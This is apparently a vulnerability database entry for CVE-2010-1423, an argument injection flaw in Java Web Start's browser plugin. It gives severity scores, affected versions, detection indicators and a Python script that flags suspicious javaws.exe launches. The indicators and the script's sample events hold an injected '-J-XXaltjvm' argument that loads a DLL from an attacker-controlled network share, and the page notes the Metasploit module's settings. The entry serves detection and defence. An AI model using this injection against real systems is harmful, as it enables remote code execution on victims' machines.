CVE-2010-1423
published 2010-04-15


Priority: P268, critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 55.58% (98.9th percentile)
Argument injection vulnerability in the URI handler in (a) Java NPAPI plugin and (b) Java Deployment Toolkit in Java 6 Update 10, 19, and other versions, when running on Windows and possibly on Linux, allows remote attackers to execute arbitrary code via the (1) -J or (2) -XXaltjvm argument to javaws.exe, which is processed by the launch method. NOTE: some of these details are obtained from third party information.

Affected

4 ranges
Vendor | Product | Version range | Fixed in
oracle | jdk | <= 1.6.0 |
oracle | jdk | |
oracle | jre | <= 1.6.0 |
oracle | jre | |

Detection & IOCs (extracted from sources)

command: -J-XXaltjvm=\\<attacker_host>\<share>
command: -J or -XXaltjvm argument to javaws.exe
other: clsid:8AD9C840-044E-11D1-B3E9-00805F499D93
other: clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
other: application/npruntime-scriptable-plugin;deploymenttoolkit
other: application/java-deployment-toolkit
filename: javaws.exe
  • Detect invocation of javaws.exe with -J or -XXaltjvm arguments, which are the core injection vectors for this vulnerability
  • Monitor for browser processes spawning javaws.exe with UNC paths (\\host\share) passed via -XXaltjvm, indicating WebDAV-based DLL injection
  • Detect instantiation of Java Deployment Toolkit ActiveX (CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA) or NPAPI plugin (application/npruntime-scriptable-plugin;deploymenttoolkit) calling the launch() method in browser context
  • The exploit module requires SRVPORT=80 and URIPATH=/ and uses WebDAV (OPTIONS/PROPFIND methods) to serve a malicious DLL; detect inbound WebDAV PROPFIND requests for .dll files from Windows hosts
  • Exploitation requires the target host to have the WebClient service (WebDAV Mini-Redirector) enabled; the attack will not succeed if this service is disabled
  • The Metasploit module must be run as root on a server that does not serve SMB, and requires SRVPORT=80 and URIPATH=/ for WebDAV to function
  • The vulnerability primarily affects Windows; Linux impact is uncertain per the advisory
  • All Java 6 versions since Update 10 are believed to be affected; the fix was delivered in Java 6 Update 20
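
The first two detection points above can be expressed as a check over process-creation telemetry. The following is an added example, not part of the original page or of any vendor rule; the event keys (parent, image, cmdline), the browser list, and the sample events are assumptions constructed for illustration.

```python
import re

# Browser image names are an assumption for this example; extend for your fleet.
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe"}
J_ARG = re.compile(r'(?:^|[\s"])-J\S+')          # -J<jvm option> passthrough
ALTJVM = re.compile(r'-XXaltjvm')                 # bare or wrapped in -J
UNC = re.compile(r'\\\\[^\\\s"]+\\[^\\\s"]+')     # \\host\share

def basename(path):
    return re.split(r'[\\/]', path)[-1].lower()

def classify(event):
    """Findings for one process-creation event.
    Keys 'parent', 'image', 'cmdline' are a hypothetical normalized schema."""
    if basename(event["image"]) != "javaws.exe":
        return []
    cmd, findings = event["cmdline"], []
    if J_ARG.search(cmd) or ALTJVM.search(cmd):
        findings.append("jvm-arg-injection")
    if ALTJVM.search(cmd) and UNC.search(cmd):
        findings.append("altjvm-unc-path")
    if findings and basename(event["parent"]) in BROWSERS:
        findings.append("browser-parent")
    return findings

# Constructed sample events (not taken from the page or from real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "image": r"C:\Program Files\Java\jre6\bin\javaws.exe",
     "cmdline": r'"C:\Program Files\Java\jre6\bin\javaws.exe" -J-XXaltjvm=\\host.example\share none'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Java\jre6\bin\javaws.exe",
     "cmdline": r'"C:\Program Files\Java\jre6\bin\javaws.exe" http://intranet.example/app.jnlp'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Java\jre6\bin\javaws.exe",
     "cmdline": r"javaws.exe -J-Xmx512m http://intranet.example/app.jnlp"},
]

def scan(events):
    """Return (index, findings) for every event that produced a finding."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], findings)
```

A -J argument launched from a shell (third sample) is flagged without the browser-parent tag, which lets triage separate administrative use from browser-initiated launches.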

CVSS provenance

nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat | 9.3 | CRITICAL